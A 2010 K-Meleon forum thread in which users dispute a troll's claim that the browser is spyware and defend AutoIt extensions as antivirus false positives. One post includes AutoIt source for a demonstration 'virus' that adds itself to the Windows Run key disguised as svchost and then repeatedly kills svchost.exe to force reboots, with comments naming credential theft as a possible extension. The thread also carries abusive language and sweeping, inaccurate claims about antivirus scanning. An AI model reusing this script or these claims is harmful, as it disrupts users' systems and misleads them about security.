False positives reported in some autoit extensions by antiviruses
Posted by: ExUser
Date: April 27, 2010 03:15AM

[troll post by a coward]
K-Meleon = Spyware.......

Admit it!

[Edited by JujuLand]

Here is the mail given by the troller : jkjkjkjkjkjkjkjkjk@trash2009.com
I change the title, for avoid confusion by guys who don't speak enough english.

Answer to troller:
Read some answers (disrupted, ...) and you'll see that your troll is stupide (as all trolls) and unfertile ...

[End of edition]

Edited 2 time(s). Last edit at 04/29/2010 03:48PM by disrupted.

Options: ReplyQuote
Re: K-Meleon=Spyware
Posted by: guenter
Date: April 27, 2010 03:57AM

troll!

Posted by: cruz
Date: April 27, 2010 04:32AM

I'd like to thank the person who started the other thread
and let us know what's going on.
Checked it out for myself and it's true.
Not only do I have to uninstall my favorite browser,
but I have to reinstall Windows.
This is a real knife in the back.
Thanks a lot.

Posted by: paularoid
Date: April 27, 2010 04:49AM

cruz
I'd like to thank the person who started the other thread
and let us know what's going on.
Checked it out for myself and it's true.
Not only do I have to uninstall my favorite browser,
but I have to reinstall Windows.
This is a real knife in the back.
Thanks a lot.

Install this line in your own personal config.sys file:

BREAK=GIMME :mad:

I suggest you and the other individual that started the other aforementioned thread do a little research on your own and quit relying on the questionable information given by a questionable (McAfee) security(?) program. I believe it was McAfee's program that recently sent a whole bank of systems into a reboot loop with their latest update. That to me says that anything and everything emanating from there is in serious question for validity.

Posted by: desga2
Date: April 27, 2010 08:43AM

Firefox = Spyware
Google Chrome = Spyware
IE 6,7,8 = Security holes
Opera = Spyware
ExUser = Troll

If you lives in U.S.A. you are spied by FBI and CIA.
Your neighbor peer through the window with binoculars.

But K-Meleon is 100% spyware clean.
Can you prove otherwise?

K-Meleon in Spanish

Edited 1 time(s). Last edit at 04/27/2010 08:44AM by desga2.

Posted by: siria
Date: April 27, 2010 10:03AM

Yes it was McAfee who just a few days ago distributed a real destructive, self-invented virus themselves, by declaring an original Microsoft file a virus, deleting that MS file that is so important for the function of windows that the system didnt even start anymore! THAT is real malware, and it was all over the news just days ago - Did you not read that?!

Apart from that, every antivirus company admits that there are "false positives", that's quite normal, and its not easy at all to tell if a simple command is used in a positive or negative way. Take a look at wikipedia, they sure explain it too.

Apart from that, K-Meleon was reviewed by a couple PC mags recently, when it was added to Microsofts Browserchoice.eu, along with a dozen other browsers. Don't you find it funny that none of those mags have even mentioned anything malicious?? They know about false positives, and take a second look before spreading further such errors.

And even if you don't care whether something is really evil or just by error declared so by a faulty virus checker - since when does an ORIGINAL K-Meleon contain .au-files??? Am not on my other computer right now and can't check, but highly doubt that. Anyone can verify please...?
So check an original out-of-the-box version before declaring the browser itself faulty!!

.au3 autoit files are usually written by some addon-authors, because more complicated functions just can't be added without such additional little programs in itself.
I'm sure that the guy who wrote those didn't include anything malicious, and you can look into the source code yourself, but still, if you doubt, don't declare KM itself as 'infected', if you didn't check a clean install!

Edited 2 time(s). Last edit at 04/27/2010 04:51PM by siria.

Date: April 27, 2010 10:50AM

@siria,

K-Meleon default install does not contain any *.au.
What does any browser except IE want to do with a sound file?

BTW. We are wasting time on people that do not know what they are saying (at best)
or feeding trolls (worst).

Lets shut down this thread

p.s. File classification: Audio
Mime type: audio/basic, audio/x-basic, audio/au, audio/x-au, audio/x-pn-au, audio/rmf, audio/x-rmf, audio/x-ulaw, audio/vnd.qcelp, audio/x-gsm, audio/snd

Edited 1 time(s). Last edit at 04/27/2010 10:52AM by guenter.

Posted by: mhf
Date: April 27, 2010 10:54AM

Of course - they are both trolls, just click on their usernames and you'll see their email links : dodgy.

Posted by: ndebord
Date: April 27, 2010 12:34PM

Guenter,

Trolls and Flamers aren't worth the effort of typing responses, aside from the first one: "bugger off"

<sigh>

N

Posted by: SoerenB
Date: April 27, 2010 02:46PM

Hi,

I just read some of the blogs about that recent McAfee desaster.

That seems to have been enormous, and so are those blogs, so don't open in 1.53 on a machine with less than 512MB / 1.5Gig - better use one of the gecko 1.9 versions
- and go to make yourself a cup while loading.

You'll get a real big heap of anger and frustration for your patience.

That reading might throw a different light on those two posts.
They probably were two computer newbies, affected by that desaster, and falsely seeking the origin of their troubles with K-Meleon.
With those false positives for K-Meleon, they had someone to bash.

- Well, good bye, exUser and, mainly, "d2k". I do not mind someone leaving who uses that kind of language, even leaving for a non-reason.

blog 1: mcafee-response-on-current-false-positive-issue
blog 2: a-long-day-at-mcafee

Cheers
SoerenB

Back again ...

Edited 2 time(s). Last edit at 04/27/2010 02:49PM by SoerenB.

Posted by: disrupted
Date: April 27, 2010 05:49PM

someone previously posted a thread about trojans/antiviruses in some au3 compiled scripts..i assure everyone with suspicions(including appearing siria..thank you very much for your support)that those are all false positives. not a single autoit was written -whether by me or desga or jsnj or playwin or anyone else- with the intention to add malware or malicious code.

contributors in k-meleon write in the true sense of opensource. writing macros or extensions without any financial gain in mind. we all have jobs that pay us and pay us well.. we don't need to write extensions and publicly publish them to make a few lame bucks by including spyware code to collect info. your private info is of no interest to us and never will be. if we wanted to really make money from extensions then obviously we'd write extensions to more popular browsers that have a much bigger userbase ..and without mentioning names, some firefox authors do that and ironically no one questions their very popular and spyware extensions. ofcourse spyware/antiviruses will never flag those extensions as malware because they can't detect or scan them since they are xul.

now to the main question.. why are antiviruses flagging some autoit binaries as viruses? antiviruses are in a war that they are losing anf losing fast.

those antivirus programs and their developers can no longer detect new viruses, their update definitions are always behind new viruses so they do what they call a heuristic scan. this is bogus scan and nothing but rubbish.. they don't scan anything. they simply check if a file has the same name as an entry in their definition file..if yes, they immediately flag it as a virus. another condition for their numerous false positives is when they can't actually scan a file, this often happens with binaries that are compressed.

compressed binaries are exe files that have underwent a compression routine during compiling to reduce their footprint. because they are compressed; antiviruses can not scan them so they just tell you it's a virus just because they can't scan them they become viruses..anything more stupid than that? and of course in doing that..identifying any benign file as a viruses justifies their questionable existence as bogus protection so 'hey, look user..i've found a virus, now you know i'm a good program even though that file as nothing to do with viruses but you're an idiot and you will never know' it doesn't matter to the retards developing antivirus programs the damage they are doing to good developers reputation.

autot binaries are all upx compressed, this is a default setting for the au3 compiler and hence it's actually impossible for an antivirus to scan them and know if they are antiviruses or not so it's easier for them to flag anything they can't scan as an antivirus.. better safe than sorry? no..it doesn't work that way, a proper scanner should only flag a file as bad whn it's 100% sure it's bad. we are not dealing with strawberries in a fruit market..those are computer files..many of them can be essential system files, flagging good files as viruses just to justify your existence to the dumb enduser can render a machine useless and we all know what mcafee recently did to windows xp computers.

ironically, those same antiviruses will not detect new real viruses in most cases not until the damage is already done and millions of computers become infected they they start updating their definitions when it's too late.. antiviruses are NO REAL PROTECTION. they are scam programs and recently almost all antiviruses have quarantined or deleted system files that rendered millions of computers unbootable. now someone please tell me, how is that any different from a virus itself??!

antiviruses and viruses even though they have completely different goals, they both achieve them in the same methods. hogging your cpu and memory and making your computer so slow it becomes almost useless.. no wonder the most productive users are on apple and linux machines where they have enough wisdom not to believe in antivirus/virus rubbish and give up their expensive machines to useless programs.

what's really funny, that all binaries identified as trojans by the person 'death2kmeleon' do not even establish a connection or have inet udf. this is the first rule of a trojan, it need to connect to some server and they never do..they are strictly for kmeleon and yet his antivirus identified them as trojans..could you do a check yourself and see if this script actually connects to any server?

anyone who has blind faith in antivirus should get their brains checks..they shouldn't even be using computers because having blind faith in a bogus protection will ultimately get you infected with a real virus when your stupid program cannot detect it.

the problem of false positives has been increasing rapidly in the past few years due to many factors:
1- many programs are choosing some sort of compression to reduce size
2- virus definition files are becoming useless against new and very sophisticated viruses that they can no longer detect till it;s too late.
3- many wise people(including network administrators) are challenging antiviruses, and advocating better methods for protection
4- antivirus big companies are loosing money and they need to justify their existence to stupid housewives and other morons so they flag anything as a virus to make the morons beleive the rubbish program is doing its job.

all autoit extensions come with their source(otherwise they couldn't be hosted on sf), if you're so paranoid with so much faith in your antivirus..just download the source..examine it and if your cranium is satisifed..compile it with autoit youself. i bet my life your antivirus will still flag it as a virus.

flase positives are affecting many decent devs, it's becoming so bad that ahk writers have sent an open letter with their complains.

http://www.scmagazineuk.com/mcafee-mistakenly-detects-legitimate-windows-system-files-as-malicious-in-false-positive-nightmare/article/168521/
http://en.wikipedia.org/wiki/Antivirus_software#Problems_caused_by_false_positives
http://www.raymond.cc/blog/archives/2009/05/23/false-positives-is-a-common-problem-in-todays-antivirus-software/
http://www.securelist.com/en/glossary?glossid=153654932#gloss153654932
http://www.nirsoft.net/false_positive_report.html
http://blog.nirsoft.net/2009/05/17/antivirus-companies-cause-a-big-headache-to-small-developers/
http://www.autohotkey.com/forum/viewtopic.php?t=31975
http://www.codinghorror.com/blog/2007/02/choosing-anti-anti-virus-software.html
http://news.bbc.co.uk/2/hi/technology/6431853.stm
http://www.brighthub.com/computing/smb-security/articles/5932.aspx
http://www.beyondlogic.org/solutions/trust-no-exe/trust-no-exe.htm
http://www.urbandictionary.com/define.php?term=fucktard

Posted by: neron
Date: April 27, 2010 09:06PM

Delete this post!

Posted by: caktus
Date: April 27, 2010 09:34PM

sieria
was McAfee who just a few days ago distributed a real destructive, self-invented virus themselves, by declaring an original Microsoft file a virus

That's [almost] right up there with the Sony Rootkit scam, which I still hold against them. Perhaps I carry this Sony hatred (?) thing a little too far but I always tend to figure that even a life-long good reputation or relationship can be so totally destroyed in just the blink of an eye by even the smallest mistake or misdeed and can be nearly impossible to re-build. Unless of course, you have the taxpayers bail you outgrinning smiley (sic).

EDIT: McAfee offers compensation for losses from signature debacle For the sake of MAC OS X User's and McAfee I hope this works out for every one invovled. It's good McAfee is trying to nip this problem in the bud.

Charlie

~~If it ain't broke, why screw it up?~~

Edited 1 time(s). Last edit at 04/27/2010 09:47PM by caktus.

Date: April 27, 2010 10:06PM

If you think this user is a troll, why this post have not been deleted?
I posted sometime ago a post about tls 1.2 and it was removed!

Date: April 27, 2010 10:33PM

this is a test to prove that antiviruses are pointless, how easy to write virus and even easier to fool antiviruses

i wrote me own antivirus.. only it doesn't have a payload but it acts like mcafee

i downloaded mcafee stinger(standalone scanner with definitions) and scanned with it and used several online scanners and all confirmed it was a safe file even though it isn't. that's because virus scanners CAN NOT scan compressed binaries..whether dll or exe or com, an antivirus is incapable of scanning a compressed binary, heuristically or otherwise since a compressed binary's code is locked. if an antivirus does flag a compressed binary, it's merely luck and just like it flags safe files..it didn't properly scan its functions to know what it might do.

the antivirus test is there:
http://kmext.sf.net/tests/avtest/bootcfg.exe

source:
http://kmext.sf.net/tests/avtest/bootcfg.au3

; AutoIt Version: 3.3.0
; Language: English
; Platform: Win9x/NT
; Author: yanni
;antivirus(bullshit protection programs) test

;first of all like all viruses/torjans i will register myself in startup

$spath=(@scriptdir & "\bootcfg.exe")

RegWrite( "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" ,"svchost", "REG_SZ", $spath)
; this means everytime the pc is started the file is set in registry..you can't delete it
; i will also masquerade is a legit windows file, of course mcafee might detect me since it already doesn't distingush between legit sys files and viruses..haha

; since now i'm in startup, i can do everything i want but i won't because this is just a test with no payload
;things i can do now :
; gather all your passwords and send them to a server
; fetch credit cards details and send them to a server
;format your hd or simply delete some files that i don't like
; your computer is mine now and i can wreak havoc but i will just do something annoying i will simply kill the svchost(like mcafee did!) and send your machine into an endless reboot loop
;but since i'm a good virus(much better than mcafee), i will allow you 60 seconds to terminate me from the task manager before reboot begins

msgbox(48, "antivirus test", "hey ..your machine will restart in 60 seconds if you don't kill me from the task manager", 5)
sleep(66000)
While ProcessExists("svchost.exe")
processclose("svchost.exe");
sleep(100);
Wend

msgbox(48, "bye bye sucker", "congrats for believing in your antivirus", 4)
exit

as you can see from the source, this 'virus' doesn't have a payload or even as bit as sophisticated as what virus coders can do..once the code is a compressed binary, the antivirus becomes blinded..and starts shooting in the dark.. so maybe can shoot at a virus and maybe not and at the same time it can also shoot a poor safe and innocent file.

you don't have to execute my virus'.. just download it and scan it with your bollocks safety programs. i repeat, if indeed it detects it..it's merely luck

i don't use antivirus and never will and i'm not going to download a resident crap to mess my system to prove a point, but you can prove to yourself if you want. i use trust-no-exe and simple dep protection.

running that same file vs trust-no-exe (no scanning or detecting) simple blocking to what shouldn't be running..windows can't even execute it because to windows the file does not exist

you can be smart if you want, stop making your machine a slave to a useless 'security' programs.. use trust-no-exe or take a few minutes to set up your dep properly and instead of trusting rubbish programs, you should trust your G-d given common sense.

if you don't want to be smart and want real protection and peace of mind, then you shouldn't be using windows.. get a linux distro or mac(and yes, you can install os x on any intel machine) and i don't believe in the rubbish claims that if linux or macs were as popular as windows that'd have had just as many viruses.. this is plain stupidity from people who don't know anything about operating systems. the way linux and macs(especially after darwin) function make it extremely hard if not impossible for arbitrary code to run.

if you think you are smart and yo are safe using windows with an antivirus..then have it your way and keep living in your own delusions.

Date: April 28, 2010 03:19AM

neron
Delete this post!

neron,

Why, perchance, should your post be deleted?

N

Date: April 28, 2010 12:54PM

ndebord
neron
Delete this post!

neron,

Why, perchance, should your post be deleted?

OK, welcome trolls, good stuff here!

Date: April 28, 2010 01:02PM

disrupted

i don't use antivirus and never will and i'm not going to download a resident crap to mess my system to prove a point, but you can prove to yourself if you want. i use trust-no-exe and simple dep protection.

disrupted,

I admire your will, but I am leary, so I do run anti-virus (AVAST with its multiple shield philosophy) and use MalwareBytes which catches stuff from time to time.

I do "trust no exe" as a rule, but what is simple dep protection?

N

Posted by: SoerenB
Date: April 28, 2010 01:08PM

@ neron:
not all folks here realized that you did not wish your POST deleted, but the whole THREAD.

@ disrupted:
thanks for the info! Is it free, "TrustNoExe" - couldn't find that on first sight?

@ ndebord:
Wikipedia: Data Execution Prevention

Cheers
SoerenB

Back again ...

Edited 5 time(s). Last edit at 04/28/2010 01:21PM by SoerenB.

Date: April 28, 2010 09:30PM

yep, it's free and can be downloaded from beyondlogic http://www.beyondlogic.org/solutions/trust-no-exe/trust-no-exe.htm

you can also obtain their source code if you send them an email. they have also many other useful tools..mostly the work of the IT aussie genius craig peacock

i don't know if it's that same guy exuser/death2kmeleon who doesn't have the courage to post with real identity/ip.. but another twat posted the same thing on autoit forums claiming that km's autocopy/accelerator contains a trojan.. the main code wasn't even mine and i got it from their forum and then added the accelerator bit and linked the whole process to k-meleon.. they told him it's a false positive as well but it's getting very frustrating having to defend oneself against those ignorant users and their stupid scanners. i'm not even a developer and this is all a hobby..and for the love of God, there isn't even a shred of common sense if one really wants to write a virus would it ony execute from kmeleon, i actually make sure that they never run without being passed from the macro first to avoid bugs.. or would someone write a virus with their identity known and mentioned in the sourcecode?! that's one very stupid virus writer.

in all honesty, i write those autoits for me mainly and then if others find them useful that's also great and in case anyone is wondering why restart is special( just in case they think it's special for containing malware).. restart was my first autoit extension for k-meleon and it was terribly coded and closed kmeleon in a crash way until desga fixed it.

this whole codswollop and having to defend myself in autoit forum for something i'd never do or even can do makes me think is it all really worth the trouble

Posted by: jsnj
Date: April 28, 2010 10:20PM

disrupted
this whole codswollop and having to defend myself in autoit forum for something i'd never do or even can do makes me think is it all really worth the trouble

C'mon! Can't possibly have doubts about doing what you obviously enjoy just because of a couple ignoramuses. You can either ignore'm or just post the code like you usually do. Either way, let'm scream as loud as they want. Their loss.

Date: April 28, 2010 11:51PM

disrupted

in all honesty, i write those autoits for me mainly and then if others find them useful that's also great and in case anyone is wondering why restart is special( just in case they think it's special for containing malware).. restart was my first autoit extension for k-meleon and it was terribly coded and closed kmeleon in a crash way until desga fixed it.

disrupted,

Screw the twit. There are nutjobs everywhere and if you don't post, I'm gonna cry.

:-(

N

Date: April 29, 2010 06:06AM

there's a site called virustotal which is used as reference in tch forum that some autoit extensions are malware..

i went to that site and uploaded about 10 files..more than half were already tested before according to virustotal and prompted to show already existing report, the idiot who used that site as proof that the files were trojans failed to mention that out of 39 antivirus, 4 sez there are viruses

those consistent 4 are:
f-secure
mcafeee
thehacker
trendmicro

well, i have no experience with antiviruses to say what is good and what isn't, i never heard of thehacker before and that seems like a pretty weird name for an antivirus and mcafee have already established themselves as rubbish after the svchost fiasco.

here's a report for restart that was already scanned by apparently the busy fucking bee trying to prove kmeleon/extensions are spyware
http://www.virustotal.com/analisis/0408ff0b9a3832f80668f5412bc6925e77a0f8b90e349f74b2a0134c7c2e57cf-1272473584

to those 4 "antiviruses" every ahk or autoit binary was reported the same gemini whatist and worm32 thingy.. not just km extensions but any ahk or autoit known to mankind was labelled trojan, to me those antiviruses are not scanning anything..it's obvious they have issues with upx packed, they don't know what they are=bad. now those antiviruses have very smart devs working for them and you ask me, if those products need to keep their credibility(if they do have any) they need to fire some people and hire new ones with functioning brains.

anyway, i've sent mcafee and trendmicro love letters..not that i think they'd have any impact especially after numerous complaints from nir, autit main developer and the ahk open letter.. but maybe the mcafee love letter will hurt them as it was filled with svchost reminders

i found this great link on raymound. it's a site that tests files.. not rubbish scan them, that site threatexpert.com executes your uploaded files in a sandbox and reports exactly what those files do.. naturally that takes some time 5-10 minutes but i uploaded all km ahk autoit binaries to it, more than 80..84 total i think..and the reports came back as we(with common sense) already know are not viruses but i'll post few ones for those in doubt..and those in doubt can upload whatever they believe is a trojan and check the reports

restart extension: http://www.threatexpert.com/report.aspx?md5=05ec39a07863b5a98b1cbab9a8663230

kmbimporter: http://www.threatexpert.com/report.aspx?md5=9b190da9740b747e6af6099a97a5daf8

chmviewer:
http://www.threatexpert.com/report.aspx?md5=3b3f836a4806836cf5283c1e844de55c

gul bookmark integrator:
http://www.threatexpert.com/report.aspx?md5=94ff39ca5ba1b17b6bb606399f276966

codetester: (one of me favourites and i'm probably the only one who uses it)
http://www.threatexpert.com/report.aspx?md5=062439d18940408620e924ef16880945

and domainblocker which was the only one that was reported to have a risk since it writes the selected domain to hosts file to actually block bad sites selected by the user
http://www.threatexpert.com/report.aspx?md5=b98d3ec130eb92dcbbb391631a09e3d1

the rest all came out either like this:
http://www.threatexpert.com/report.aspx?md5=c9ea04498cdc7a4dd52f8910e41855cf

or like this (no parameter bug)
http://www.threatexpert.com/report.aspx?md5=e5ea3f9f5043305f14ddb17673e001aa

feel free to upload any autoit extension and get your own report

now let's compare the threatexpert reports for km extensions with ones for viruses:
http://www.threatexpert.com/report.aspx?md5=74c1562fa86454de20304f65ce1e6508
http://www.threatexpert.com/report.aspx?md5=9533478a236cab55b5320f96f7b9db09
you can get more virus reports by going to the their reports pagehttp://www.threatexpert.com/reports.aspx

i'm sorry cruz if you had to reinstall windows because you blindly believe in whatever antivirus you use.. but you know, if you had doubts about any autoit extension you could have simply deleted it yourself.. imagine that, a virus that the user can delete without an antivirus.
unfortunately cruz you were only stabbed in the back by your antivirus and by your own stupidity

Re: TROLL : K-Meleon=Spyware
Posted by: bud
Date: April 29, 2010 08:09AM

ExUser

Admit it!

*plonk*

Date: April 29, 2010 12:37PM

bud
ExUser

Admit it!

*plonk*

As in add a usenet reader to the kill file.

N

Date: April 29, 2010 12:42PM

SoerenB
@ neron:
not all folks here realized that you did not wish your POST deleted, but the whole THREAD.

@ disrupted:
thanks for the info! Is it free, "TrustNoExe" - couldn't find that on first sight?

@ ndebord:
Wikipedia: Data Execution Prevention

SoerenB,

Ah, my mistake. I didn't get the reference to actual programs. A different way to go for sure. Have to look at these two programs closely. Thanks (and disrupted!).

N

Date: April 29, 2010 12:58PM

bud
ExUser

Admit it!

*plonk*

Troll's intentions are IMHO that the honest and helpful produce many posts and waste time. One of their favorite means is to offend - e.g. by distorting truth or slandering. They are not open to critical evaluation and repeat their unproven arguments.

My suggestion is that we do a poll whether trollish posts are closed immediately on first request in future. Like other obviously insulting posts. And that they stay closed if not the original creator asks for deletion - because he did not intend to hurt any ppl.

Edited 1 time(s). Last edit at 04/29/2010 01:12PM by guenter.

Date: April 29, 2010 03:46PM

i think it's better to leave this particular thread because others with less knowledge about false positives might get alerts about some autoits and so this can be a reference.

that user exuser\death2kmeleon went to techalert forums and complained that when he made a post about kmeleon 'trojans' it got removed.
http://www.techsupportalert.com/best-free-web-browser.htm
(middle of page or find in page 'virustotal')

of course he didn't say the reason it got removed is because he was very rude and said very bad things about the developers and not because no one wants to argue his claims so i\ll give him the benefit of the doubt that's he's just rude and didn't know better ways to enquire about his concerns

exuser and clutz, this is how decent people ask when they have doubts:
http://kmeleonbrowser.org/forum/read.php?9,103294
(post like kleon)

not sure if that;s him as well, wouldn't be surprised but 99% of wot users are brainwashed:
http://www.mywot.com/en/scorecard/kmeleon.sourceforge.net/comment-6538173#comment-6538173
allowing this comment actually sez a lot about wot(web of trolls) than kmeleon.. anyone still trusting the credibility of wot should think again because many good sites got slandered and some lost business due to the moronic ratings left by wot users..they actually communicate together and decide to put a site down for whatever reason by flooding with bad ratings or comments until of course the company pays them and gets the 'web of trust' merit logo to place on the website (this is what happens when you allow blonde finnish half-educated housewives start their own web business)

Posted by: mhf
Date: April 29, 2010 05:30PM

See this thread too...

Edited 1 time(s). Last edit at 04/29/2010 05:31PM by mhf.

Date: April 29, 2010 05:53PM

disrupted
i think it's better to leave this particular thread because others with less knowledge about false positives might get alerts about some autoits and so this can be a reference.

that user exuser\death2kmeleon went to techalert forums and complained that when he made a post about kmeleon 'trojans' it got removed.
http://www.techsupportalert.com/best-free-web-browser.htm
(middle of page or find in page 'virustotal')

of course he didn't say the reason it got removed is because he was very rude and said very bad things about the developers and not because no one wants to argue his claims so i\ll give him the benefit of the doubt that's he's just rude and didn't know better ways to enquire about his concerns

exuser and clutz, this is how decent people ask when they have doubts:
http://kmeleonbrowser.org/forum/read.php?9,103294
(post like kleon)

1.) I did not mean to delete this thread - too much time spend already.

2.) That is what I mean - not delete but close. Usenet had customs that told moderators when to close threads. E.g. when You called someone a Nazi. Thread was closed. You had lost the argument.

3.) Yes. Makes a big difference.

But IMHO Bud just wanted to stubbornly repeat. & this thread started like 2 anonymouses posted.

First one suggested that PPL here are criminals or sinners that have to admit their wrong ways. The second picking up the thrown ball. And it was not clear whether they where a single person.

We had this before. I do not like it.

Threads that start like that are under a bad star & should IMHO be stopped.

Else PPL that did honest work might feel insulted and consider to go away or stop their work.

disrupted
makes me think is it all really worth the trouble

And I have been at that point too.

Edited 1 time(s). Last edit at 04/29/2010 05:56PM by guenter.

Pages: 12Next
Current Page: 1 of 2

K-Meleon forum is powered by Phorum.